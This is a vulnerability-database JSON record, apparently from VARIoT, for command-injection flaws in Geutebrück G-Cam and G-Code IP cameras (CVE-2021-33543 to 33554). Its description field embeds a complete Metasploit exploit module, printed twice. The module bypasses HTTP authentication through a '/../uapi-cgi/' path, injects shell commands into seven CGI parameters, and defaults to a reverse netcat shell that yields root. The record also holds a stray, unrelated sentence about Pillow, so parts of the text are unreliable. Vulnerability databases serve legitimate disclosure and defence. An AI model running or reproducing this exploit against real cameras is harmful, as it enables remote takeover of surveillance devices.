"date": "2017-05-19T03:29:00.230000",
"db": "NVD",
"id": "CVE-2017-5174",
"ident": null
}
]
},
"sources_update_date": {
"_id": null,
"data": [
{
"date": "2017-02-24T00:00:00",
"db": "CNVD",
"id": "CNVD-2017-01888",
"ident": null
},
{
"date": "2019-10-03T00:00:00",
"db": "VULHUB",
"id": "VHN-113377",
"ident": null
},
{
"date": "2019-10-03T00:00:00",
"db": "VULMON",
"id": "CVE-2017-5174",
"ident": null
},
{
"date": "2017-03-07T04:02:00",
"db": "BID",
"id": "96209",
"ident": null
},
{
"date": "2017-06-21T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2017-004264",
"ident": null
},
{
"date": "2019-10-23T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201702-610",
"ident": null
},
{
"date": "2025-04-20T01:37:25.860000",
"db": "NVD",
"id": "CVE-2017-5174",
"ident": null
}
]
},
"threat_type": {
"_id": null,
"data": "remote",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201702-610"
}
],
"trust": 0.6
},
"title": {
"_id": null,
"data": "Geutebruck IP Camera G-Cam/EFD-2250 Access control vulnerability",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2017-004264"
}
],
"trust": 0.8
},
"type": {
"_id": null,
"data": "lack of information",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201702-610"
}
],
"trust": 0.6
}
}
VAR-202109-0859
Vulnerability from variot - Updated: 2025-01-30 22:27Multiple camera devices by UDP Technology, Geutebrück and other vendors are vulnerable to command injection, which may allow an attacker to remotely execute arbitrary code. GEUTEBRUCK Provided by the company G-Cam E2 and G-Code The following multiple vulnerabilities exist in. * Lack of authentication for important features (CWE-306) - CVE-2021-33543 ‥ * Command injection (CWE-77) - CVE-2021-33544 , CVE-2021-33548 , CVE-2021-33550 , CVE-2021-33551 , CVE-2021-33552 , CVE-2021-33553 , CVE-2021-33554 ‥ * Stack-based buffer overflow (CWE-121) - CVE-2021-33545 , CVE-2021-33546 , CVE-2021-33547 , CVE-2021-33549The expected impact depends on each vulnerability, but it may be affected as follows. * Confidential information stolen by a remote third party due to improper default user authentication settings - CVE-2021-33543 ‥ * Arbitrary code executed by command injection by a remote third party - CVE-2021-33544 , CVE-2021-33548 , CVE-2021-33550 , CVE-2021-33551 , CVE-2021-33552 , CVE-2021-33553 , CVE-2021-33554 ‥ * By a remote third party counter Parameter buffer overflow is triggered and arbitrary code is executed - CVE-2021-33545 ‥ * By a remote third party name Parameter buffer overflow is triggered and arbitrary code is executed - CVE-2021-33546 ‥ * By a remote third party profile Parameter buffer overflow is triggered and arbitrary code is executed - CVE-2021-33547 ‥ * By a remote third party action Parameter buffer overflow is triggered and arbitrary code is executed - CVE-2021-33549. Pillow is a Python-based image processing library. There is currently no information about this vulnerability, please feel free to follow CNNVD or manufacturer announcements. ##
This module requires Metasploit: https://metasploit.com/download
Current source: https://github.com/rapid7/metasploit-framework
class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient include Msf::Exploit::CmdStager prepend Msf::Exploit::Remote::AutoCheck
def initialize(info = {}) super( update_info( info, 'Name' => 'Geutebruck Multiple Remote Command Execution', 'Description' => %q{ This module bypasses the HTTP basic authentication used to access the /uapi-cgi/ folder and exploits multiple authenticated arbitrary command execution vulnerabilities within the parameters of various pages on Geutebruck G-Cam EEC-2xxx and G-Code EBC-21xx, EFD-22xx, ETHC-22xx, and EWPC-22xx devices running firmware versions <= 1.12.0.27 as well as firmware versions 1.12.13.2 and 1.12.14.5. Successful exploitation results in remote code execution as the root user. },
'Author' => [
'Titouan Lazard', # Of RandoriSec - Discovery
'Ibrahim Ayadhi', # Of RandoriSec - Discovery and Metasploit Module
'Sébastien Charbonnier' # Of RandoriSec - Metasploit Module
],
'License' => MSF_LICENSE,
'References' => [
['CVE', '2021-33543'],
['CVE', '2021-33544'],
['CVE', '2021-33548'],
['CVE', '2021-33550'],
['CVE', '2021-33551'],
['CVE', '2021-33552'],
['CVE', '2021-33553'],
['CVE', '2021-33554'],
[ 'URL', 'http://geutebruck.com' ],
[ 'URL', 'https://www.randorisec.fr/udp-technology-ip-camera-vulnerabilities/'],
[ 'URL', 'https://us-cert.cisa.gov/ics/advisories/icsa-21-208-03']
],
'DisclosureDate' => '2021-07-08',
'Privileged' => true,
'Platform' => ['unix', 'linux'],
'Arch' => [ARCH_CMD],
'Targets' => [
[
'CVE-2021-33544 - certmngr.cgi', {
'http_method' => 'GET',
'http_vars' => {
'action' => 'createselfcert',
'local' => Rex::Text.rand_text_alphanumeric(10..16),
'country' => Rex::Text.rand_text_alphanumeric(2),
'state' => '$(PLACEHOLDER_CMD)',
'organization' => Rex::Text.rand_text_alphanumeric(10..16),
'organizationunit' => Rex::Text.rand_text_alphanumeric(10..16),
'commonname' => Rex::Text.rand_text_alphanumeric(10..16),
'days' => Rex::Text.rand_text_numeric(2..4),
'type' => Rex::Text.rand_text_numeric(2..4)
},
'uri' => '/../uapi-cgi/certmngr.cgi'
}
],
[
'CVE-2021-33548 - factory.cgi', {
'http_method' => 'GET',
'http_vars' => { 'preserve' => '$(PLACEHOLDER_CMD)' },
'uri' => '/../uapi-cgi/factory.cgi'
}
],
[
'CVE-2021-33550 - language.cgi', {
'http_method' => 'GET',
'http_vars' => { 'date' => '$(PLACEHOLDER_CMD)' },
'uri' => '/../uapi-cgi/language.cgi'
}
],
[
'CVE-2021-33551 - oem.cgi', {
'http_method' => 'GET',
'http_vars' => {
'action' => 'set',
'enable' => 'yes',
'environment.lang' => '$(PLACEHOLDER_CMD)'
},
'uri' => '/../uapi-cgi/oem.cgi'
}
],
[
'CVE-2021-33552 - simple_reclistjs.cgi', {
'http_method' => 'GET',
'http_vars' => {
'action' => 'get',
'timekey' => Rex::Text.rand_text_numeric(2..4),
'date' => '$(PLACEHOLDER_CMD)'
},
'uri' => '/../uapi-cgi/simple_reclistjs.cgi'
}
],
[
'CVE-2021-33553 - testcmd.cgi', {
'http_method' => 'GET',
'http_vars' => { 'command' => 'PLACEHOLDER_CMD' },
'uri' => '/../uapi-cgi/testcmd.cgi'
}
],
[
'CVE-2021-33554 - tmpapp.cgi', {
'http_method' => 'GET',
'http_vars' => { 'appfile.filename' => '$(PLACEHOLDER_CMD)' },
'uri' => '/../uapi-cgi/tmpapp.cgi'
}
]
],
'DefaultTarget' => 0,
'DefaultOptions' => {
'PAYLOAD' => 'cmd/unix/reverse_netcat_gaping'
},
'Notes' => {
'Stability' => ['CRASH_SAFE'],
'Reliability' => ['REPEATABLE_SESSION'],
'SideEffects' => ['ARTIFACTS_ON_DISK']
}
)
)
end
def firmware res = send_request_cgi( 'method' => 'GET', 'uri' => '/brand.xml' ) unless res print_error('Connection failed!') return false end
unless res&.body && !res.body.empty?
print_error('Empty body in the response!')
return false
end
res_xml = res.get_xml_document
if res_xml.at('//firmware').nil?
print_error('Target did not respond with a XML document containing the "firmware" element!')
return false
end
raw_text = res_xml.at('//firmware').text
if raw_text && raw_text.match(/\d\.\d{1,3}\.\d{1,3}\.\d{1,3}/)
raw_text.match(/\d\.\d{1,3}\.\d{1,3}\.\d{1,3}/)[0]
else
print_error('Target responded with a XML document containing the "firmware" element but its not a valid version string!')
false
end
end
def check version = firmware if version == false return CheckCode::Unknown('Target did not respond with a valid XML response that we could retrieve the version from!') end
rex_version = Rex::Version.new(version)
vprint_status("Found Geutebruck version #{rex_version}")
if rex_version <= Rex::Version.new('1.12.0.27') || rex_version == Rex::Version.new('1.12.13.2') || rex_version == Rex::Version.new('1.12.14.5')
return CheckCode::Appears
end
CheckCode::Safe
end
def exploit print_status("#{rhost}:#{rport} - Setting up request...")
method = target['http_method']
if method == 'GET'
http_method_vars = 'vars_get'
else
http_method_vars = 'vars_post'
end
http_vars = target['http_vars']
http_vars.each do |(k, v)|
if v.include? 'PLACEHOLDER_CMD'
http_vars[k]['PLACEHOLDER_CMD'] = payload.encoded
end
end
print_status("Sending CMD injection request to #{rhost}:#{rport}")
send_request_cgi(
{
'method' => method,
'uri' => target['uri'],
http_method_vars => http_vars
}
)
print_status('Exploit complete, you should get a shell as the root user!')
end end
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-202109-0859",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "g-code een-2010",
"scope": "eq",
"trust": 1.0,
"vendor": "geutebrueck",
"version": "1.12.14.5"
},
{
"model": "g-cam ebc-2110",
"scope": "eq",
"trust": 1.0,
"vendor": "geutebrueck",
"version": "1.12.13.2"
},
{
"model": "g-cam ebc-2112",
"scope": "lte",
"trust": 1.0,
"vendor": "geutebrueck",
"version": "1.12.0.27"
},
{
"model": "g-cam efd-2250",
"scope": "eq",
"trust": 1.0,
"vendor": "geutebrueck",
"version": "1.12.13.2"
},
{
"model": "g-cam ewpc-2275",
"scope": "lte",
"trust": 1.0,
"vendor": "geutebrueck",
"version": "1.12.0.27"
},
{
"model": "g-code een-2040",
"scope": "eq",
"trust": 1.0,
"vendor": "geutebrueck",
"version": "1.12.13.2"
},
{
"model": "g-cam ewpc-2271",
"scope": "eq",
"trust": 1.0,
"vendor": "geutebrueck",
"version": "1.12.13.2"
},
{
"model": "g-cam ebc-2111",
"scope": "eq",
"trust": 1.0,
"vendor": "geutebrueck",
"version": "1.12.13.2"
},
{
"model": "g-cam ethc-2239",
"scope": "eq",
"trust": 1.0,
"vendor": "geutebrueck",
"version": "1.12.13.2"
},
{
"model": "g-cam ethc-2230",
"scope": "eq",
"trust": 1.0,
"vendor": "geutebrueck",
"version": "1.12.14.5"
},
{
"model": "g-cam ethc-2249",
"scope": "eq",
"trust": 1.0,
"vendor": "geutebrueck",
"version": "1.12.14.5"
},
{
"model": "g-code een-2010",
"scope": "eq",
"trust": 1.0,
"vendor": "geutebrueck",
"version": "1.12.13.2"
},
{
"model": "g-cam efd-2241",
"scope": "eq",
"trust": 1.0,
"vendor": "geutebrueck",
"version": "1.12.14.5"
},
{
"model": "g-cam ebc-2110",
"scope": "lte",
"trust": 1.0,
"vendor": "geutebrueck",
"version": "1.12.0.27"
},
{
"model": "g-code een-2040",
"scope": "lte",
"trust": 1.0,
"vendor": "geutebrueck",
"version": "1.12.0.27"
},
{
"model": "g-cam ewpc-2271",
"scope": "lte",
"trust": 1.0,
"vendor": "geutebrueck",
"version": "1.12.0.27"
},
{
"model": "g-cam ebc-2111",
"scope": "lte",
"trust": 1.0,
"vendor": "geutebrueck",
"version": "1.12.0.27"
},
{
"model": "g-cam ethc-2239",
"scope": "lte",
"trust": 1.0,
"vendor": "geutebrueck",
"version": "1.12.0.27"
},
{
"model": "g-cam efd-2250",
"scope": "lte",
"trust": 1.0,
"vendor": "geutebrueck",
"version": "1.12.0.27"
},
{
"model": "g-cam ethc-2249",
"scope": "eq",
"trust": 1.0,
"vendor": "geutebrueck",
"version": "1.12.13.2"
},
{
"model": "g-cam ethc-2230",
"scope": "eq",
"trust": 1.0,
"vendor": "geutebrueck",
"version": "1.12.13.2"
},
{
"model": "g-cam ewpc-2270",
"scope": "eq",
"trust": 1.0,
"vendor": "geutebrueck",
"version": "1.12.14.5"
},
{
"model": "g-code eec-2400",
"scope": "eq",
"trust": 1.0,
"vendor": "geutebrueck",
"version": "1.12.14.5"
},
{
"model": "g-code een-2010",
"scope": "lte",
"trust": 1.0,
"vendor": "geutebrueck",
"version": "1.12.0.27"
},
{
"model": "g-cam efd-2241",
"scope": "eq",
"trust": 1.0,
"vendor": "geutebrueck",
"version": "1.12.13.2"
},
{
"model": "g-cam ethc-2240",
"scope": "eq",
"trust": 1.0,
"vendor": "geutebrueck",
"version": "1.12.14.5"
},
{
"model": "g-cam efd-2251",
"scope": "eq",
"trust": 1.0,
"vendor": "geutebrueck",
"version": "1.12.14.5"
},
{
"model": "g-cam ethc-2230",
"scope": "lte",
"trust": 1.0,
"vendor": "geutebrueck",
"version": "1.12.0.27"
},
{
"model": "g-cam efd-2241",
"scope": "lte",
"trust": 1.0,
"vendor": "geutebrueck",
"version": "1.12.0.27"
},
{
"model": "g-code eec-2400",
"scope": "eq",
"trust": 1.0,
"vendor": "geutebrueck",
"version": "1.12.13.2"
},
{
"model": "g-cam ewpc-2270",
"scope": "eq",
"trust": 1.0,
"vendor": "geutebrueck",
"version": "1.12.13.2"
},
{
"model": "g-cam ethc-2249",
"scope": "lte",
"trust": 1.0,
"vendor": "geutebrueck",
"version": "1.12.0.27"
},
{
"model": "g-code eec-2400",
"scope": "lte",
"trust": 1.0,
"vendor": "geutebrueck",
"version": "1.12.0.27"
},
{
"model": "g-cam ethc-2240",
"scope": "eq",
"trust": 1.0,
"vendor": "geutebrueck",
"version": "1.12.13.2"
},
{
"model": "g-cam efd-2251",
"scope": "eq",
"trust": 1.0,
"vendor": "geutebrueck",
"version": "1.12.13.2"
},
{
"model": "g-cam ewpc-2275",
"scope": "eq",
"trust": 1.0,
"vendor": "geutebrueck",
"version": "1.12.14.5"
},
{
"model": "g-cam ebc-2112",
"scope": "eq",
"trust": 1.0,
"vendor": "geutebrueck",
"version": "1.12.14.5"
},
{
"model": "g-cam ewpc-2270",
"scope": "lte",
"trust": 1.0,
"vendor": "geutebrueck",
"version": "1.12.0.27"
},
{
"model": "g-cam ewpc-2275",
"scope": "eq",
"trust": 1.0,
"vendor": "geutebrueck",
"version": "1.12.13.2"
},
{
"model": "g-cam ebc-2110",
"scope": "eq",
"trust": 1.0,
"vendor": "geutebrueck",
"version": "1.12.14.5"
},
{
"model": "g-cam efd-2250",
"scope": "eq",
"trust": 1.0,
"vendor": "geutebrueck",
"version": "1.12.14.5"
},
{
"model": "g-cam efd-2251",
"scope": "lte",
"trust": 1.0,
"vendor": "geutebrueck",
"version": "1.12.0.27"
},
{
"model": "g-cam ethc-2240",
"scope": "lte",
"trust": 1.0,
"vendor": "geutebrueck",
"version": "1.12.0.27"
},
{
"model": "g-code een-2040",
"scope": "eq",
"trust": 1.0,
"vendor": "geutebrueck",
"version": "1.12.14.5"
},
{
"model": "g-cam ebc-2112",
"scope": "eq",
"trust": 1.0,
"vendor": "geutebrueck",
"version": "1.12.13.2"
},
{
"model": "g-cam ewpc-2271",
"scope": "eq",
"trust": 1.0,
"vendor": "geutebrueck",
"version": "1.12.14.5"
},
{
"model": "g-cam ebc-2111",
"scope": "eq",
"trust": 1.0,
"vendor": "geutebrueck",
"version": "1.12.14.5"
},
{
"model": "g-cam ethc-2239",
"scope": "eq",
"trust": 1.0,
"vendor": "geutebrueck",
"version": "1.12.14.5"
},
{
"model": "",
"scope": "eq",
"trust": 0.8,
"vendor": "geutebruck",
"version": "\u2025 * firmware 1.12.13.2 1.12.14.5"
},
{
"model": "",
"scope": "eq",
"trust": 0.8,
"vendor": "geutebruck",
"version": "* een-20xx"
},
{
"model": "",
"scope": "eq",
"trust": 0.8,
"vendor": "geutebruck",
"version": "* efd-22xx"
},
{
"model": "",
"scope": "eq",
"trust": 0.8,
"vendor": "geutebruck",
"version": "* ethc-22xx"
},
{
"model": "",
"scope": "eq",
"trust": 0.8,
"vendor": "geutebruck",
"version": "\u2025 * g-cam"
},
{
"model": "",
"scope": "eq",
"trust": 0.8,
"vendor": "geutebruck",
"version": "* eec-2xx"
},
{
"model": "",
"scope": "eq",
"trust": 0.8,
"vendor": "geutebruck",
"version": "works with the above firmware s e2 series camera models encoders"
},
{
"model": "",
"scope": "eq",
"trust": 0.8,
"vendor": "geutebruck",
"version": null
},
{
"model": "",
"scope": "eq",
"trust": 0.8,
"vendor": "geutebruck",
"version": "* ebc-21xx"
},
{
"model": "",
"scope": "eq",
"trust": 0.8,
"vendor": "geutebruck",
"version": "\u2025 * g-code"
},
{
"model": "",
"scope": "eq",
"trust": 0.8,
"vendor": "geutebruck",
"version": "( multiple products )"
},
{
"model": "",
"scope": "eq",
"trust": 0.8,
"vendor": "geutebruck",
"version": "* ewpc-22xx"
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2021-002023"
},
{
"db": "NVD",
"id": "CVE-2021-33550"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Titouan Lazard and Ibrahim Ayadhi from RandoriSec reported these vulnerabilities to CISA.",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-202107-2087"
}
],
"trust": 0.6
},
"cve": "CVE-2021-33550",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "SINGLE",
"author": "nvd@nist.gov",
"availabilityImpact": "PARTIAL",
"baseScore": 6.5,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 8.0,
"id": "CVE-2021-33550",
"impactScore": 6.4,
"integrityImpact": "PARTIAL",
"severity": "MEDIUM",
"trust": 1.0,
"vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P",
"version": "2.0"
}
],
"cvssV3": [
{
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"author": "nvd@nist.gov",
"availabilityImpact": "HIGH",
"baseScore": 7.2,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"exploitabilityScore": 1.2,
"id": "CVE-2021-33550",
"impactScore": 5.9,
"integrityImpact": "HIGH",
"privilegesRequired": "HIGH",
"scope": "UNCHANGED",
"trust": 2.0,
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
{
"attackComplexity": "Low",
"attackVector": "Network",
"author": "OTHER",
"availabilityImpact": "High",
"baseScore": 7.2,
"baseSeverity": "High",
"confidentialityImpact": "High",
"exploitabilityScore": null,
"id": "JVNDB-2021-002023",
"impactScore": null,
"integrityImpact": "High",
"privilegesRequired": "High",
"scope": "Unchanged",
"trust": 0.8,
"userInteraction": "None",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
"version": "3.0"
}
],
"severity": [
{
"author": "nvd@nist.gov",
"id": "CVE-2021-33550",
"trust": 1.0,
"value": "HIGH"
},
{
"author": "info@cert.vde.com",
"id": "CVE-2021-33550",
"trust": 1.0,
"value": "HIGH"
},
{
"author": "OTHER",
"id": "JVNDB-2021-002023",
"trust": 0.8,
"value": "High"
},
{
"author": "CNNVD",
"id": "CNNVD-202107-2087",
"trust": 0.6,
"value": "HIGH"
},
{
"author": "CNNVD",
"id": "CNNVD-202104-975",
"trust": 0.6,
"value": "MEDIUM"
}
]
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2021-002023"
},
{
"db": "CNNVD",
"id": "CNNVD-202107-2087"
},
{
"db": "CNNVD",
"id": "CNNVD-202104-975"
},
{
"db": "NVD",
"id": "CVE-2021-33550"
},
{
"db": "NVD",
"id": "CVE-2021-33550"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Multiple camera devices by UDP Technology, Geutebr\u00fcck and other vendors are vulnerable to command injection, which may allow an attacker to remotely execute arbitrary code. GEUTEBRUCK Provided by the company G-Cam E2 and G-Code The following multiple vulnerabilities exist in. * Lack of authentication for important features (CWE-306) - CVE-2021-33543 \u2025 * Command injection (CWE-77) - CVE-2021-33544 , CVE-2021-33548 , CVE-2021-33550 , CVE-2021-33551 , CVE-2021-33552 , CVE-2021-33553 , CVE-2021-33554 \u2025 * Stack-based buffer overflow (CWE-121) - CVE-2021-33545 , CVE-2021-33546 , CVE-2021-33547 , CVE-2021-33549The expected impact depends on each vulnerability, but it may be affected as follows. * Confidential information stolen by a remote third party due to improper default user authentication settings - CVE-2021-33543 \u2025 * Arbitrary code executed by command injection by a remote third party - CVE-2021-33544 , CVE-2021-33548 , CVE-2021-33550 , CVE-2021-33551 , CVE-2021-33552 , CVE-2021-33553 , CVE-2021-33554 \u2025 * By a remote third party counter Parameter buffer overflow is triggered and arbitrary code is executed - CVE-2021-33545 \u2025 * By a remote third party name Parameter buffer overflow is triggered and arbitrary code is executed - CVE-2021-33546 \u2025 * By a remote third party profile Parameter buffer overflow is triggered and arbitrary code is executed - CVE-2021-33547 \u2025 * By a remote third party action Parameter buffer overflow is triggered and arbitrary code is executed - CVE-2021-33549. Pillow is a Python-based image processing library. \nThere is currently no information about this vulnerability, please feel free to follow CNNVD or manufacturer announcements. ##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule \u003c Msf::Exploit::Remote\n Rank = ExcellentRanking\n include Msf::Exploit::Remote::HttpClient\n include Msf::Exploit::CmdStager\n prepend Msf::Exploit::Remote::AutoCheck\n\n def initialize(info = {})\n super(\n update_info(\n info,\n \u0027Name\u0027 =\u003e \u0027Geutebruck Multiple Remote Command Execution\u0027,\n \u0027Description\u0027 =\u003e %q{\n This module bypasses the HTTP basic authentication used to access the /uapi-cgi/ folder\n and exploits multiple authenticated arbitrary command execution vulnerabilities within\n the parameters of various pages on Geutebruck G-Cam EEC-2xxx and G-Code EBC-21xx,\n EFD-22xx, ETHC-22xx, and EWPC-22xx devices running firmware versions \u003c= 1.12.0.27 as\n well as firmware versions 1.12.13.2 and 1.12.14.5. Successful exploitation results in\n remote code execution as the root user. \n },\n\n \u0027Author\u0027 =\u003e [\n \u0027Titouan Lazard\u0027, # Of RandoriSec - Discovery\n \u0027Ibrahim Ayadhi\u0027, # Of RandoriSec - Discovery and Metasploit Module\n \u0027S\u00e9bastien Charbonnier\u0027 # Of RandoriSec - Metasploit Module\n ],\n \u0027License\u0027 =\u003e MSF_LICENSE,\n \u0027References\u0027 =\u003e [\n [\u0027CVE\u0027, \u00272021-33543\u0027],\n [\u0027CVE\u0027, \u00272021-33544\u0027],\n [\u0027CVE\u0027, \u00272021-33548\u0027],\n [\u0027CVE\u0027, \u00272021-33550\u0027],\n [\u0027CVE\u0027, \u00272021-33551\u0027],\n [\u0027CVE\u0027, \u00272021-33552\u0027],\n [\u0027CVE\u0027, \u00272021-33553\u0027],\n [\u0027CVE\u0027, \u00272021-33554\u0027],\n [ \u0027URL\u0027, \u0027http://geutebruck.com\u0027 ],\n [ \u0027URL\u0027, \u0027https://www.randorisec.fr/udp-technology-ip-camera-vulnerabilities/\u0027],\n [ \u0027URL\u0027, \u0027https://us-cert.cisa.gov/ics/advisories/icsa-21-208-03\u0027]\n ],\n \u0027DisclosureDate\u0027 =\u003e \u00272021-07-08\u0027,\n \u0027Privileged\u0027 =\u003e true,\n \u0027Platform\u0027 =\u003e [\u0027unix\u0027, \u0027linux\u0027],\n \u0027Arch\u0027 =\u003e [ARCH_CMD],\n \u0027Targets\u0027 =\u003e [\n [\n \u0027CVE-2021-33544 - certmngr.cgi\u0027, {\n \u0027http_method\u0027 =\u003e \u0027GET\u0027,\n \u0027http_vars\u0027 =\u003e {\n \u0027action\u0027 =\u003e \u0027createselfcert\u0027,\n \u0027local\u0027 =\u003e Rex::Text.rand_text_alphanumeric(10..16),\n \u0027country\u0027 =\u003e Rex::Text.rand_text_alphanumeric(2),\n \u0027state\u0027 =\u003e \u0027$(PLACEHOLDER_CMD)\u0027,\n \u0027organization\u0027 =\u003e Rex::Text.rand_text_alphanumeric(10..16),\n \u0027organizationunit\u0027 =\u003e Rex::Text.rand_text_alphanumeric(10..16),\n \u0027commonname\u0027 =\u003e Rex::Text.rand_text_alphanumeric(10..16),\n \u0027days\u0027 =\u003e Rex::Text.rand_text_numeric(2..4),\n \u0027type\u0027 =\u003e Rex::Text.rand_text_numeric(2..4)\n },\n \u0027uri\u0027 =\u003e \u0027/../uapi-cgi/certmngr.cgi\u0027\n }\n ],\n [\n \u0027CVE-2021-33548 - factory.cgi\u0027, {\n \u0027http_method\u0027 =\u003e \u0027GET\u0027,\n \u0027http_vars\u0027 =\u003e { \u0027preserve\u0027 =\u003e \u0027$(PLACEHOLDER_CMD)\u0027 },\n \u0027uri\u0027 =\u003e \u0027/../uapi-cgi/factory.cgi\u0027\n }\n ],\n [\n \u0027CVE-2021-33550 - language.cgi\u0027, {\n \u0027http_method\u0027 =\u003e \u0027GET\u0027,\n \u0027http_vars\u0027 =\u003e { \u0027date\u0027 =\u003e \u0027$(PLACEHOLDER_CMD)\u0027 },\n \u0027uri\u0027 =\u003e \u0027/../uapi-cgi/language.cgi\u0027\n }\n ],\n [\n \u0027CVE-2021-33551 - oem.cgi\u0027, {\n \u0027http_method\u0027 =\u003e \u0027GET\u0027,\n \u0027http_vars\u0027 =\u003e {\n \u0027action\u0027 =\u003e \u0027set\u0027,\n \u0027enable\u0027 =\u003e \u0027yes\u0027,\n \u0027environment.lang\u0027 =\u003e \u0027$(PLACEHOLDER_CMD)\u0027\n },\n \u0027uri\u0027 =\u003e \u0027/../uapi-cgi/oem.cgi\u0027\n }\n ],\n [\n \u0027CVE-2021-33552 - simple_reclistjs.cgi\u0027, {\n \u0027http_method\u0027 =\u003e \u0027GET\u0027,\n \u0027http_vars\u0027 =\u003e {\n \u0027action\u0027 =\u003e \u0027get\u0027,\n \u0027timekey\u0027 =\u003e Rex::Text.rand_text_numeric(2..4),\n \u0027date\u0027 =\u003e \u0027$(PLACEHOLDER_CMD)\u0027\n },\n \u0027uri\u0027 =\u003e \u0027/../uapi-cgi/simple_reclistjs.cgi\u0027\n }\n ],\n [\n \u0027CVE-2021-33553 - testcmd.cgi\u0027, {\n \u0027http_method\u0027 =\u003e \u0027GET\u0027,\n \u0027http_vars\u0027 =\u003e { \u0027command\u0027 =\u003e \u0027PLACEHOLDER_CMD\u0027 },\n \u0027uri\u0027 =\u003e \u0027/../uapi-cgi/testcmd.cgi\u0027\n }\n ],\n [\n \u0027CVE-2021-33554 - tmpapp.cgi\u0027, {\n \u0027http_method\u0027 =\u003e \u0027GET\u0027,\n \u0027http_vars\u0027 =\u003e { \u0027appfile.filename\u0027 =\u003e \u0027$(PLACEHOLDER_CMD)\u0027 },\n \u0027uri\u0027 =\u003e \u0027/../uapi-cgi/tmpapp.cgi\u0027\n }\n ]\n ],\n \u0027DefaultTarget\u0027 =\u003e 0,\n \u0027DefaultOptions\u0027 =\u003e {\n \u0027PAYLOAD\u0027 =\u003e \u0027cmd/unix/reverse_netcat_gaping\u0027\n },\n \u0027Notes\u0027 =\u003e {\n \u0027Stability\u0027 =\u003e [\u0027CRASH_SAFE\u0027],\n \u0027Reliability\u0027 =\u003e [\u0027REPEATABLE_SESSION\u0027],\n \u0027SideEffects\u0027 =\u003e [\u0027ARTIFACTS_ON_DISK\u0027]\n }\n )\n )\n end\n\n def firmware\n res = send_request_cgi(\n \u0027method\u0027 =\u003e \u0027GET\u0027,\n \u0027uri\u0027 =\u003e \u0027/brand.xml\u0027\n )\n unless res\n print_error(\u0027Connection failed!\u0027)\n return false\n end\n\n unless res\u0026.body \u0026\u0026 !res.body.empty?\n print_error(\u0027Empty body in the response!\u0027)\n return false\n end\n\n res_xml = res.get_xml_document\n if res_xml.at(\u0027//firmware\u0027).nil?\n print_error(\u0027Target did not respond with a XML document containing the \"firmware\" element!\u0027)\n return false\n end\n raw_text = res_xml.at(\u0027//firmware\u0027).text\n if raw_text \u0026\u0026 raw_text.match(/\\d\\.\\d{1,3}\\.\\d{1,3}\\.\\d{1,3}/)\n 